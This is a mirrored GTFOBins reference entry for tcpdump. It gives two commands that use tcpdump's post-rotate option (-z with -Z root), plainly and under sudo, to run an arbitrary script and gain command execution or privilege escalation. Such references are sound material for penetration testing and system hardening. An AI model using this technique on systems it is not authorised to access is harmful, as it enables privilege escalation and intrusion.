mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2025-07-12 05:24:53 +02:00
10 lines
329 B
Markdown
10 lines
329 B
Markdown
---
|
|
functions:
|
|
execute-non-interactive:
|
|
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
|
|
tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
|
|
sudo-enabled:
|
|
- code: echo "whoami > /tmp/whoami" > /tmp/tmpfile
|
|
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
|
|
---
|